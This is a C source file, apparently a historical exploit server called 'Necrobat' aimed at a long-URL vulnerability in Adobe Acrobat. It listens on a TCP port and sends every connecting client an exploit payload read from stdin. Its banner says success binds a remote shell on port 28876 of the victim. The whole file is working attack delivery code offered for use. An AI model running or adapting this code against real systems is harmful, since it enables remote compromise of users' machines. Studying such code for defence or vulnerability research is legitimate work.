#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define DEFAULT_PORT 2808

int main(int argc, char *argv[], char *envp[]) {
  int server, sock;
  struct sockaddr_in  server_addr = {
    AF_INET, htons(DEFAULT_PORT), INADDR_ANY,        // sin_family, sin_port, sin_addr
    {'\0', '\0', '\0', '\0', '\0', '\0', '\0', '\0'}        // padding
  }, addr;
  int sizeof_client_address = sizeof addr;
  char exploit[65535], request[65535];
  int exploit_length, request_length;
  int pid;

  if (argc<1 || argc>2) {
    printf("Usage: %s [PORT]\n", argv[0]);
    exit(-1);
  }
  if (argc == 2) server_addr.sin_port = htons(atoi(argv[1]));
  exploit_length = fread(exploit, 1, sizeof exploit, stdin);

  printf("- Necrobat --------------------------------------------------\n"
         "  Acrobat long url exploit.\n"
         "  Written by SkyLined <SkyLined@EduP.TUDelft.nl>.\n"
         "  Credits for the vulnerability go to Rafel Ivgi\n"
         "                                      <the_insider@mail.com>.\n"
         "  Shellcode based on work by H D Moore (www.metasploit.com).\n"
         "\n"
         "  Binds a shell at port 28876 if successfull.\n"
         "  Tested with: WIN2KEN/Acrobat ?\n"
         "--------------------------------------------------------------\n",
         argv[1]);


  if ((server = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1 ||
       bind(server, (struct sockaddr*)&(server_addr), sizeof server_addr) < 0 ||
       listen(server, 8) < 0) {
    fprintf(stderr, "[-] Accepting connections on port %d failed: ", ntohs(server_addr.sin_port));
    perror(NULL);
    exit(-1);
  }
  fprintf(stdout, "\n[+] Accepting connections on port %d...", ntohs(server_addr.sin_port));

  //---------------------------------------------------------------------------

  do {
    sock = accept(server, (struct sockaddr*)&(addr), &sizeof_client_address);
  } while (fork() != 0);

  pid = getpid();

  fprintf(stdout, "\n[+] %d Connection from %s:%d!\n", pid, inet_ntoa(addr.sin_addr), ntohs(addr.sin_port));
  do {
    request_length = read(sock, request, sizeof request);
    fprintf(stdout, "[+] %d Read %d bytes.\n", pid, request_length);
//    fwrite(buffer, 1, i, stdout);
  } while (request_length == sizeof request);
  fprintf(stdout, "[+] %d Write %d bytes.\n", pid, exploit_length);
  write(sock, exploit, exploit_length);

  close(sock);
  return 0;
}